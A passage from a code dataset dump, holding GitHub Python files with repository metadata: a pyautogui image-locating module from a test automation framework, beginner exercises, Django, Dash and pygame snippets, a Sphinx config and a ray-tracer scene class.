None\n\n\ndef _pyautogui(step_data_set):\n \"\"\" Gets coordinates for pyautogui (doesn't provide an object) \"\"\"\n\n \"\"\" \n Valid files:\n We do our best to find the file for the user, it can be:\n Full path. Eg: /home/user/test.png\n Local directory. Eg: test.png\n Zeuz File Attachment. Eg: test.png - The full path is in the Shared Variables under the filename\n\n If provided, scales image to fit currently displayed resolution, so as to provide a more accurate match \n There are three modes of operation:\n No resolution - don't re-scale: (image, element paramater, filename.png)\n Resolution in filename - scale accordingly: (image, element paramater, filename-1920x1080.png)\n Resolution in step data - scale accordingly: (1920x1080, element paramater, filename.png)\n \n If a reference element is provided (parent/child parameter, name doens't matter), then we have three methods by which to locate the element of interest:\n Field = left, right, up, down - we'll favour any elements in this direction and return it\n Field = INDEX NUMBER - If a number is provided (>=1), we'll return the nTH element found\n Field = ANYTHING ELSE - We'll find the closest element to it\n \"\"\"\n\n # Only used by desktop, so only import here\n import pyautogui, os.path, re\n\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n\n # Recall file attachment, if not already set\n file_attachment = []\n if sr.Test_Shared_Variables(\"file_attachment\"):\n file_attachment = sr.Get_Shared_Variables(\"file_attachment\")\n\n # Parse data set\n try:\n file_name = \"\"\n file_name_parent = \"\"\n resolution = \"\"\n direction = \"all\"\n index = False\n idx = 0\n confidence = 0.85\n for left, mid, right in step_data_set:\n left = left.strip().lower()\n mid = mid.strip().lower()\n if mid == \"element parameter\": # Find element line\n # resolution = left # Save the resolution of the source of the image, if provided\n if \"resolution\" in left:\n resolution = right.strip().lower()\n elif \"index\" in left:\n idx = int(right.strip())\n elif \"confidence\" in left:\n confidence = float(right.replace(\"%\", \"\").replace(\" \", \"\").lower())/100\n else:\n file_name = right.strip()\n if \"~\" in file_name:\n file_name = str(Path(os.path.expanduser(file_name)))\n\n if mid in (\"child parameter\", \"parent parameter\"): # Find a related image, that we'll use as a reference point\n file_name_parent = right # Save Value as the filename\n direction = left.lower().strip() # Save Field as a possible distance or index\n elif mid == \"action\" and file_name == \"\": # Alternative method, there is no element parameter, so filename is expected on the action line\n file_name = Path(right) # Save Value as the filename\n\n # Check that we have some value\n if file_name == \"\":\n return \"zeuz_failed\"\n\n # Try to find the image file\n if file_name not in file_attachment and not os.path.exists(file_name):\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Could not find file attachment called %s, and could not find it locally\" % file_name,\n 3,\n )\n return \"zeuz_failed\"\n if file_name in file_attachment:\n file_name = file_attachment[file_name] # In file is an attachment, get the full path\n\n if file_name_parent != \"\":\n if file_name_parent not in file_attachment and not os.path.exists(file_name_parent):\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Could not find file attachment called %s, and could not find it locally\" % file_name_parent,\n 3,\n )\n return \"zeuz_failed\"\n if file_name_parent in file_attachment:\n file_name_parent = file_attachment[file_name_parent] # In file is an attachment, get the full path\n\n # Now file_name should have a directory/file pointing to the correct image\n\n # There's a problem when running from Zeuz with encoding. pyautogui seems sensitive to it. This fixes that\n # file_name = file_name.encode('ascii')\n if file_name_parent != \"\":\n file_name_parent = file_name_parent.encode(\"ascii\")\n\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error parsing data set\")\n\n # Parse direction (physical direction, index or nothing)\n if direction != \"all\": # If a reference image was specified (direction would be set to a different value)\n try:\n if direction in (\"left\", \"right\", \"up\", \"down\"): # User specified a direction to look for the element\n pass\n else:\n try:\n direction = int(direction) # Test if it's a number, if so, format it properly\n index = True\n direction -= 1 # Offset by one, because user will set first element as one, but in the array it's element zero\n except: # Not a number\n direction = \"all\" # Default to search all directions equally (find the closest image alement to the reference)\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error parsing direction\")\n\n # Find element information\n try:\n # Scale image if required\n regex = re.compile(r\"(\\d+)\\s*x\\s*(\\d+)\", re.IGNORECASE) # Create regex object with expression\n match = regex.search(file_name) # Search for resolution within filename (this is the resolution of the screen the image was captured on)\n if match is None and resolution != \"\": # If resolution not in filename, try to find it in the step data\n match = regex.search(resolution) # Search for resolution within the Field of the element paramter row (this is the resolution of the screen the image was captured on)\n\n if match is not None: # Match found, so scale\n CommonUtil.ExecLog(sModuleInfo, \"Scaling image (%s)\" % match.group(0), 5)\n size_w, size_h = (\n int(match.group(1)),\n int(match.group(2)),\n ) # Extract width, height from match (is screen resolution of desktop image was taken on)\n file_name = _scale_image(file_name, size_w, size_h) # Scale image element\n if file_name_parent != \"\":\n file_name_parent = _scale_image(file_name_parent, size_w, size_h) # Scale parent image element\n\n # Find image on screen (file_name here is either an actual directory/file or a PIL image object after scaling)\n element_list = []\n start = time.time()\n while True:\n element = pyautogui.locateAllOnScreen(\n file_name, grayscale=True, confidence=confidence\n ) # Get coordinates of element. Use greyscale for increased speed and better matching across machines. May cause higher number of false-positives\n element_list = tuple(element)\n if element_list or time.time() > start + int(sr.Get_Shared_Variables(\"element_wait\")):\n break\n time.sleep(0.1)\n # if len(tuple(tmp)) == 0: # !!! This should work, but accessing the generator causes it to lose one or more of it's results, thus causing an error when we try to use it with a single image\n # print \">>>>IN\", element\n # CommonUtil.ExecLog(sModuleInfo, \"Image element not found\", 0)\n # return \"zeuz_failed\"\n\n ################################################################################\n ######################### ALL PIECES SET - FIND ELEMENT ########################\n ################################################################################\n\n # If no reference image, just return the first match\n if file_name_parent == \"\":\n # element_list = tuple(element)\n # First match reassigned as the only element\n element = None\n if -len(element_list) <= idx < len(element_list):\n element = element_list[idx]\n elif len(element_list) != 0:\n CommonUtil.ExecLog(sModuleInfo, \"Found %s elements. Index out of range\" % len(element_list), 3)\n\n # Reference image specified, so find the closest image element to it\n else:\n CommonUtil.ExecLog(sModuleInfo, \"Locating with a reference element\", 0)\n\n # Get coordinates of reference image\n start = time.time()\n while True:\n element_parent = pyautogui.locateOnScreen(\n file_name_parent, grayscale=True, confidence=0.85\n )\n if element_parent or time.time() > start + int(sr.Get_Shared_Variables(\"element_wait\")):\n break\n time.sleep(0.1)\n if element_parent == None:\n CommonUtil.ExecLog(sModuleInfo, \"Reference image not found\", 0)\n return \"zeuz_failed\"\n\n # Initialize variables\n parent_centre = (\n element_parent[0] + int(element_parent[2] / 2),\n element_parent[1] + int(element_parent[3] / 2),\n ) # Calculate centre coordinates of parent\n element_result = (\n []\n ) # This will hold the best match that we've found as we check them all\n distance_new = [0, 0] # This will hold the current distance\n distance_best = [0, 0] # This will hold the distance for the best match\n\n # User provided an index number, so find the nTH element\n if index == True:\n try:\n element = tuple(element)[direction]\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Provided index number is invalid\")\n\n # User provided a direction, or no indication, so try to find the element based on that\n else:\n # Loop through all found elements, and find the one that is closest to the reference image element\n for e in element:\n # Calculate centre of image to centre of reference image\n distance_new[0] = parent_centre[0] - (e[0] + int(e[2] / 2))\n distance_new[1] = parent_centre[1] - (e[1] + int(e[3] / 2))\n\n # Remove negavite values, depending on direction. This allows us to favour a certain direction by keeping the original number\n if direction == \"all\":\n distance_new[0] = abs(distance_new[0]) # Remove negative sign for x\n distance_new[1] = abs(distance_new[1]) # Remove negative sign for y\n elif direction in (\"up\", \"down\"):\n distance_new[0] = abs(distance_new[0]) # Remove negative sign for x - we don't care about that direction\n elif direction in (\"left\", \"right\"):\n distance_new[1] = abs(distance_new[1]) # Remove negative sign for y - we don't care about that direction\n\n # Compare distances\n if element_result == []: # First run, just save this as the closest match\n element_result = e\n distance_best = list(distance_new) # Very important! - this must be saved with the list(), because python will make distance_best a pointer to distance_new without it, thus screwing up what we are trying to do. Thanks Python.\n else: # Subsequent runs, compare distances\n if direction == \"all\" and (distance_new[0] < distance_best[0] or distance_new[1] < distance_best[1]): # If horozontal or vertical is closer than our best/closest distance that we've found thus far\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n elif direction == \"up\" and (distance_new[0] < distance_best[0] or distance_new[1] > distance_best[1]): # Favour Y direction up\n element_result = e # Save this element as the best match\n distance_best = list(\n distance_new\n ) # Save the distance for further comparison\n elif direction == \"down\" and (distance_new[0] < distance_best[0] or distance_new[1] < distance_best[1]): # Favour Y direction down\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n elif direction == \"left\" and (distance_new[0] > distance_best[0] or distance_new[1] < distance_best[1]): # Favour X direction left\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n elif direction == \"right\" and (distance_new[0] < distance_best[0] or distance_new[1] < distance_best[1]): # Favour X direction right\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n\n # Whether there is one or more matches, we now have the closest image to our reference, so save the result in the common variable\n element = element_result\n\n # Check result\n if element is None or element in failed_tag_list or element == \"\":\n return \"zeuz_failed\"\n else:\n return element\n\n except:\n traceback.print_exc()\n return \"zeuz_failed\"\n\n\ndef _scale_image(file_name, size_w, size_h):\n \"\"\" This function calculates ratio and scales an image for comparison by _pyautogui() \"\"\"\n\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n\n # Only used by desktop, so only import here\n import pyautogui\n from PIL import Image\n from decimal import Decimal\n\n try:\n # Open image file\n file_name = open(file_name, \"rb\") # Read file into memory\n file_name = Image.open(file_name) # Convert to PIL format\n\n # Read sizes\n screen_w, screen_h = pyautogui.size() # Read screen resolution\n image_w, image_h = file_name.size # Read the image element's actual size\n\n # Calculate new image size\n if size_w > screen_w: # Make sure we create the scaling ratio in the proper direction\n ratio = Decimal(size_w) / Decimal(screen_w) # Get ratio (assume same for height)\n else:\n ratio = Decimal(screen_w) / Decimal(size_w) # Get ratio (assume same for height)\n size = (int(image_w * ratio), int(image_h * ratio)) # Calculate new resolution of image element\n\n # Scale image\n # file_name.thumbnail(size, Image.LANCZOS) # Resize image per calculation above\n\n return file_name.resize(size) # Return the scaled image object\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error scaling image\")\n\n\n\"\"\"\n#Sample sibling Example1:\n#xpath_format = '//<sibling_tag>[<sibling_element>]/ancestor::<immediate_parent_tag>[<immediate_parent_element>]//<target_tag>[<target_element>]'\n\n#step_data_set = [( 'tag' , 'parent parameter' , 'tagvale' , False , False ) , ( 'id' , 'element parameter' , 'twotabsearchtextbox' , False , False ) , ( 'text' , 'selenium action' , 'Camera' , False , False ), ( 'class' , 'sibling parameter' , 'twotabsearchtextbox' , False , False ), ( 'class' , 'parent parameter' , 'twotabsearchtextbox' , False , False )]\n\n#step_data_set = [ ( 'role' , 'element parameter' , 'checkbox' , False , False , '' ) , ( 'text' , 'sibling parameter' , 'charlie' , False , False , '' ) , ( '*class' , 'parent parameter' , 'md-table-row' , False , False , '' ) , ( 'click' , 'selenium action' , 'click' , False , False , '' ) ] \n\n\n\n#Sample parent and element:\n#'//*[@bblocalname=\"deviceActivationPasswordTextBox\"]/descendant::*[@type=\"password\"]'\n#step_data_set = [ ( 'typ' , 'element parameter' , 'password' , False , False , '' ) , ( 'text' , 'selenium action' , 'your password' , False , False , '' ) , ( 'bblocalname' , 'parent parameter' , 'deviceActivationPasswordTextBox' , False , False , '' ) ] \n\n\n\nstep_data_set = [ ( '*resource-id' , 'element parameter' , 'com.assetscience.androidprodiagnostics.cellmd:id/next' , False , False ) , ( 'click' , 'appium action' , 'na' , False , False ) ]\n\n\ndriver = None\nquery_debug = True\nglobal driver_type \ndriver_type = \"selenium\"\nglobal debug \ndebug = True\nprint _construct_query (step_data_set)\"\"\"\n\ndriver_type = 'selenium'\n\nif __name__ == \"__main__\":\n x,y=_construct_query([\n ['tag','parent parameter','hello//'],\n [\"arial-label\", 'element parameter', 'https://asdasd']\n ])\n print(x)\n CommonUtil.ExecLog(\n 'sModuleInfo',\n \"To locate the Element we used %s:\\n%s\"\n % (y, x),\n 5,\n )","repo_name":"AutomationSolutionz/Zeuz_Python_Node","sub_path":"Framework/Built_In_Automation/Shared_Resources/LocateElement.py","file_name":"LocateElement.py","file_ext":"py","file_size_in_byte":72226,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"19797969907","text":"# Crie um programa que leia o nome de uma cidade diga se ela começa ou não com o nome “SANTO”.\n\nnome_cidade = input('Digite o nome da sua cidade: ').strip().upper().split()\n\nif nome_cidade[0] == \"SANTO\":\n print('O nome da sua cidade começa com o nome \"Santo\"')\nelse:\n print('O nome da sua cidade não começa com o nome \"Santo\"')\n\n\n'''nome_cidade = input('Digite o nome da sua cidade: ').strip().upper()\nprint(nome_cidade[:5] == \"SANTO\")'''\n","repo_name":"fellipemarlus/python-exercises","sub_path":"Exercises/024-verificando_as_primeiras_letras_de_um_texto.py","file_name":"024-verificando_as_primeiras_letras_de_um_texto.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"610065494","text":"from django import template\nfrom resources.models import Vehicle\nfrom datetime import date\n\nregister = template.Library()\n\n@register.simple_tag\ndef get_vehicle(num_items):\n lista = []\n v1 = Vehicle()\n v1.name = 'Uno'\n v1.description = 'Carro da Fiat'\n v1.license_plate = 'HKF3654'\n v1.manufacture_year = date(2007, 1, 1)\n v1.save()\n lista.append(v1)\n # lista.append('Fiat')\n # lista.append('KIA')\n # lista.append('Volks')\n # lista.append('Ford')\n # lista.append('Toyota')\n\n return lista[:num_items]\n","repo_name":"mugbug/django-course","sub_path":"fleet_control/resources/templatetags/vehicle_tags.py","file_name":"vehicle_tags.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73791571254","text":"lista = []\ncontinua = 'S'\ncont = 0\nwhile continua not in 'nN':\n num = int(input('Digite um valor: '))\n continua = str(input('Quer continuar? [S/N] ')).upper().strip()[0]\n lista.append(num)\n cont += 1\nlista.sort(reverse=True)\nprint('-='*25)\nprint(f'Você digitou {cont} elementos.')\nprint(f'Os valores em ordem decrescente são {lista}')\nif 5 in lista:\n print('O valor 5 foi encontrado na lista! ')\nelse:\n print('O valor 5 não foi encontrado na lista! ')\n\n\n","repo_name":"ivanDourado/guanabaraPython","sub_path":"mundo3/exercicios/ex081-lista.py","file_name":"ex081-lista.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20138467421","text":"import pygame\npygame.init()\npygame.font.init()\nscreen = pygame.display.set_mode((800, 600))\npygame.display.set_caption('Học Toán Online')\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nfont = pygame.font.Font('freesansbold.ttf', 32)\ndialogue_font = pygame.font.SysFont('utf8', 32)\nrunning = True\nbg = pygame.image.load(('IMG_111.jpg'))\nbg = pygame.transform.scale(bg, (800, 700))\nbando = pygame.image.load(('IMG_111.jpg'))\nmenu = pygame.image.load(('IMG_111.jpg'))\nhome = pygame.image.load(('IMG_111.jpg'))\nhome = pygame.transform.scale(home, (50, 50))\nx = 'first'\nclock = pygame.time.Clock()\nfont1 = pygame.font.SysFont('san', 80)\ntextstart = font.render(\"START \", True, BLACK)\n\nwhile running:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n pygame.draw.rect(screen, BLACK, (0, 0, 800, 600))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1 and (mouse_x > 300 and mouse_x < 500) and (mouse_y > 350 and mouse_y < 450) and x == 'first':\n x = 'bg'\n if x == 'first':\n pygame.draw.rect(screen, WHITE, (300, 350, 200, 100))\n screen.blit(textstart, (350, 380))\n if x == 'bg':\n screen.blit(bg, (0, 0))\n\n pygame.display.flip()\n clock.tick(120)\n","repo_name":"TienManh308/Tin","sub_path":"python/pygame/phanmem/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12227193648","text":"#!/usr/bin/python3\n\"\"\"function to define a grid\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"grid is a list of lists containing integers\"\"\"\n num_rows = len(grid)\n num_cols = len(grid[0])\n perimeter = 0\n\n for row in range(num_rows):\n for col in range(num_cols):\n if grid[row][col] == 1:\n perimeter += 4\n if row > 0 and grid[row - 1][col] == 1:\n perimeter -= 2\n if col > 0 and grid[row][col - 1] == 1:\n perimeter -= 2\n return perimeter\n","repo_name":"Patrick-052/alx-low_level_programming","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41413648006","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 15:22:18 2019\n\n@author: 106300\n\"\"\"\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objs as go\n\n\ndef add_patch(dib,p_x,p_y, color):\n dib.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-0.25,y0=p_y-0.25,x1=p_x+0.25,y1=p_y+0.25,\n line=dict(color=color), fillcolor=color),layer = \"below\", row=1, col=1 )\n return\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ndf = pd.read_csv(\n 'https://gist.githubusercontent.com/chriddyp/' +\n '5d1ea79569ed194d432e56108a04d188/raw/' +\n 'a9f9e8076b837d541398e999dcbac2b2826a81f8/'+\n 'gdp-life-exp-2007.csv')\n\np_x = 1\np_y = 1\nfig = go.Figure()\napp.layout = html.Div([\nfig.add_shape(\n # filled Rectangle\n go.layout.Shape(\n type=\"rect\",\n x0=3,\n y0=1,\n x1=6,\n y1=2,\n line=dict(\n color=\"RoyalBlue\",\n width=2,\n ),\n fillcolor=\"LightSkyBlue\",\n ))\n\n])\nprint('primero paso por aqui')\n\nif __name__ == '__main__':\n print(df)\n app.run_server(debug=True)","repo_name":"orlando68/Stanford","sub_path":"app4m.py","file_name":"app4m.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74448296053","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom home.forms import ContactForm\nfrom django.contrib import messages\n\nfrom home.models import Teacher\n# Create your views here.\n\n\ndef home(request):\n\n teachers = Teacher.objects.all()\n\n if request.method == 'POST':\n # POST here means all data from frontend\n form = ContactForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'The form has been submitted!')\n else:\n form = ContactForm()\n\n context = {\n 'form': form,\n \"teachers\": teachers,\n }\n return render(request, 'home/index.html', context)\n\n\ndef about(request):\n return render(request, 'home/about.html')\n\n\ndef teacher(request):\n teachers = Teacher.objects.all()\n context = {\n 'teachers': teachers\n }\n return render(request, 'home/teacher.html', context)\n","repo_name":"gurolbilgin/landing_django","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9124146923","text":"import logging\nimport os\nimport math\n\n\ndef size_and_amount_files(folder='data'):\n total_size = os.path.getsize(folder)\n amount_files = 0\n for item in os.listdir(folder):\n itempath = os.path.join(folder, item)\n if os.path.isfile(itempath):\n amount_files += 1\n total_size += os.path.getsize(itempath)\n elif os.path.isdir(itempath):\n total_size += size_and_amount_files(itempath)\n return total_size, amount_files\n\n\ndef convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n\nclass CustomFormatter(logging.Formatter):\n\n grey = \"\\x1b[38;20m\"\n yellow = \"\\x1b[33;20m\"\n blue = \"\\x1b[1;34m\"\n red = \"\\x1b[31;20m\"\n bold_red = \"\\x1b[31;1m\"\n reset = \"\\x1b[0m\"\n format = \" [ %(levelname)s ] - %(name)s - %(asctime)s - %(message)s (%(filename)s:%(lineno)d)\"\n\n FORMATS = {\n logging.DEBUG: grey + format + reset,\n logging.INFO: blue + format + reset,\n logging.WARNING: yellow + format + reset,\n logging.ERROR: red + format + reset,\n logging.CRITICAL: bold_red + format + reset\n }\n\n def format(self, record):\n log_fmt = self.FORMATS.get(record.levelno)\n formatter = logging.Formatter(log_fmt)\n return formatter.format(record)\n","repo_name":"Merlijnmacgillavry/Library-Project","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27322685471","text":"# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\nimport sys\n#sys.path.append('../')\n# sys.path.insert(0, os.path.abspath('.'))\nsys.path.insert(0, os.path.abspath('../'))\nsys.path.insert(0, os.path.abspath('../majortrack'))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = 'MajorTrack'\ncopyright = '2019, Jonas I. Liechti'\nauthor = 'Jonas I. Liechti'\n\n# The full version, including alpha/beta/rc tags\nrelease = 'v1.0'\n# ############################################################################\n# ############################################################################\n\n\ndef release():\n with open('version.txt') as f:\n return f.read()\n\n\n# major/minor\nrelease = release().split('+')[0]\nversion = '.'.join(release.split('.')[:2])\n# ############################################################################\n# ############################################################################\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'sphinx.ext.coverage',\n 'sphinx.ext.todo',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.ifconfig',\n 'sphinx.ext.viewcode',\n 'sphinx.ext.githubpages',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.extlinks',\n 'sphinx.ext.napoleon',\n 'sphinxcontrib.bibtex',\n]\n\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n\n# ############################################################################\n# ############################################################################\nsource_suffix = ['.rst', 'md']\nmaster_doc = 'index'\ntodo_include_todos = True\n# ############################################################################\n# ############################################################################\n\n# ############################################################################\n# ############################################################################\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\nif not on_rtd: # only import and set the theme if we're building docs locally\n import sphinx_rtd_theme\n html_theme = \"sphinx_rtd_theme\"\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n# ############################################################################\n# ############################################################################\n\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\n# html_theme = 'alabaster'\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# ############################################################################\n# ############################################################################\n# Example configuration for intersphinx: refer to the Python standard library.\nintersphinx_mapping = {\n 'python': ('https://docs.python.org/3', None),\n 'numpy': ('http://docs.scipy.org/doc/numpy/', None),\n 'matplotlib': ('http://matplotlib.org', None),\n 'sphinx': ('http://www.sphinx-doc.org/en/stable/', None),\n # 'pyalluv': ('https://pyalluv.readthedocs.io/', None),\n # 'colorseq': ('https://colorsequence.readthedocs.io/', None)\n }\n# ############################################################################\n# ############################################################################\n\n# ############################################################################\n# ############################################################################\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\nadd_module_names = False\n# ############################################################################\n# ############################################################################\n","repo_name":"tools4digits/MajorTrack","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"de","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"30103836215","text":"from PIL import Image\nimport numpy as np\nimport time\nimport copy\nfrom multiprocessing import Pool, cpu_count\nfrom .utils import colour_functions as cf\nfrom .camera import Camera\nfrom .utils.constants import *\nfrom .utils.vector3 import vec3, rgb\nfrom .ray import Ray, get_raycolor, get_distances\nfrom . import lights\nfrom .backgrounds.skybox import SkyBox\nfrom .backgrounds.panorama import Panorama\n\n\ndef get_raycolor_tuple(x):\n return get_raycolor(*x)\n\n\ndef batch_rays(rays, batch_size):\n batches = []\n n_rays = len(rays)\n for ray_ind in range(0, n_rays, batch_size):\n batches.append(Ray.concatenate(rays[ray_ind : ray_ind + batch_size]))\n return batches\n\n\nclass Scene:\n def __init__(self, ambient_color=rgb(0.01, 0.01, 0.01), n=vec3(1.0, 1.0, 1.0)):\n # n = index of refraction (by default index of refraction of air n = 1.)\n\n self.scene_primitives = []\n self.collider_list = []\n self.shadowed_collider_list = []\n self.Light_list = []\n self.importance_sampled_list = []\n self.ambient_color = ambient_color\n self.n = n\n self.importance_sampled_list = []\n\n def add_Camera(self, look_from, look_at, **kwargs):\n self.camera = Camera(look_from, look_at, **kwargs)\n\n def add_PointLight(self, pos, color):\n self.Light_list += [lights.PointLight(pos, color)]\n\n def add_DirectionalLight(self, Ldir, color):\n self.Light_list += [lights.DirectionalLight(Ldir.normalize(), color)]\n\n def add(self, primitive, importance_sampled=False):\n self.scene_primitives += [primitive]\n self.collider_list += primitive.collider_list\n\n if importance_sampled == True:\n self.importance_sampled_list += [primitive]\n\n if primitive.shadow == True:\n self.shadowed_collider_list += primitive.collider_list\n\n def add_Background(self, img, light_intensity=0.0, blur=0.0, spherical=False):\n\n primitive = None\n if spherical == False:\n primitive = SkyBox(img, light_intensity=light_intensity, blur=blur)\n else:\n primitive = Panorama(img, light_intensity=light_intensity, blur=blur)\n\n self.scene_primitives += [primitive]\n self.collider_list += primitive.collider_list\n\n def render(self, samples_per_pixel, progress_bar=False, batch_size=None):\n\n print(\"Rendering...\")\n\n t0 = time.time()\n color_RGBlinear = rgb(0.0, 0.0, 0.0)\n\n all_rays = [self.camera.get_ray(self.n) for i in range(samples_per_pixel)]\n\n n_proc = cpu_count()\n rays_per_batch = len(self.camera.get_ray(self.n))\n batch_size = batch_size or np.ceil(samples_per_pixel / n_proc).astype(int)\n\n all_rays_batched = batch_rays(all_rays, batch_size)\n args = [(batch, copy.deepcopy(self)) for batch in all_rays_batched]\n # all_rays = [\n # (self.camera.get_ray(self.n), copy.deepcopy(self))\n # for i in range(samples_per_pixel)\n # ]\n if progress_bar == True:\n try:\n import progressbar\n except ModuleNotFoundError:\n print(\"progressbar module is required. \\nRun: pip install progressbar\")\n\n bar = progressbar.ProgressBar(maxval=samples_per_pixel)\n\n with Pool(processes=n_proc) as pool:\n bar.start()\n for i, color in enumerate(\n pool.imap_unordered(get_raycolor_tuple, args)\n ):\n for batch in range(batch_size):\n beg, end = batch * rays_per_batch, (batch + 1) * rays_per_batch\n color_RGBlinear += color[beg:end]\n bar.update(i)\n bar.finish()\n\n else:\n with Pool(processes=n_proc) as pool:\n for i, color in enumerate(\n pool.imap_unordered(get_raycolor_tuple, args)\n ):\n for batch in range(batch_size):\n beg, end = batch * rays_per_batch, (batch + 1) * rays_per_batch\n color_RGBlinear += color[beg:end]\n\n # average samples per pixel (antialiasing)\n color_RGBlinear = color_RGBlinear / samples_per_pixel\n # gamma correction\n color = cf.sRGB_linear_to_sRGB(color_RGBlinear.to_array())\n\n print(\"Render Took\", time.time() - t0)\n\n img_RGB = []\n for c in color:\n # average ray colors that fall in the same pixel. (antialiasing)\n img_RGB += [\n Image.fromarray(\n (\n 255\n * np.clip(c, 0, 1).reshape(\n (self.camera.screen_height, self.camera.screen_width)\n )\n ).astype(np.uint8),\n \"L\",\n )\n ]\n\n return Image.merge(\"RGB\", img_RGB)\n\n def get_distances(\n self,\n ): # Used for debugging ray-primitive collisions. Return a grey map of objects distances.\n\n print(\"Rendering...\")\n t0 = time.time()\n color_RGBlinear = get_distances(self.camera.get_ray(self.n), scene=self)\n # gamma correction\n color = color_RGBlinear.to_array()\n\n print(\"Render Took\", time.time() - t0)\n\n img_RGB = [\n Image.fromarray(\n (\n 255\n * np.clip(c, 0, 1).reshape(\n (self.camera.screen_height, self.camera.screen_width)\n )\n ).astype(np.uint8),\n \"L\",\n )\n for c in color\n ]\n return Image.merge(\"RGB\", img_RGB)\n","repo_name":"HinMal/Python-Raytracer","sub_path":"sightpy/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"15472541373","text":"import random\nimport time\n\n# import pygame\n\nfrom pymtl3 import *\nfrom pymtl3.passes.yosys import TranslationImportPass\nimport random\n\n\n# s = 1000\n# width = s\n# height = s\n#\n# screen = pygame.display.set_mode((width, height))\n#\n#\n# def random_lines():\n# sum = 0\n# for x in range(1000):\n# start = time.time()\n# r = random.randint(0, 255)\n# g = random.randint(0, 255)\n# b = random.randint(0, 255)\n# x0 = random.randint(0, width 